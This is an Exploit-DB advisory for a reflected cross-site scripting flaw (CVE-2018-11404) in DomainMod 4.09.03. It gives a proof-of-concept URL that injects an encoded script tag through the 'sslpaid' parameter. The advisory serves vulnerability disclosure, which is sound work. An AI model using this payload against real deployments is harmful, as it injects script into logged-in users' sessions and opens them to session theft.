DomainMod 4.09.03 - 'sslpaid' Cross-Site Scripting

EDB-ID: 44783
Author: longer
Published: 2018-05-28
CVE: CVE-2018-11404
Type: Webapps
Platform: PHP
Vulnerable App: N/A 

 # Date: 2018-05-28 
 # Exploit Author: longer([email protected]
 # Vendor Homepage: domainmod (https://github.com/domainmod/domainmod) 
 # Software Link: domainmod (https://github.com/domainmod/domainmod) 
 # Version: v4.09.03 
 # CVE : CVE-2018-11404 
   
 An issue was discovered in DomainMod v4.09.03.(https://github.com/domainmod/domainmod/issues/63) 
 After the user logged in, open the url: 
 http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E

Source: www.exploit-db.com
Related Posts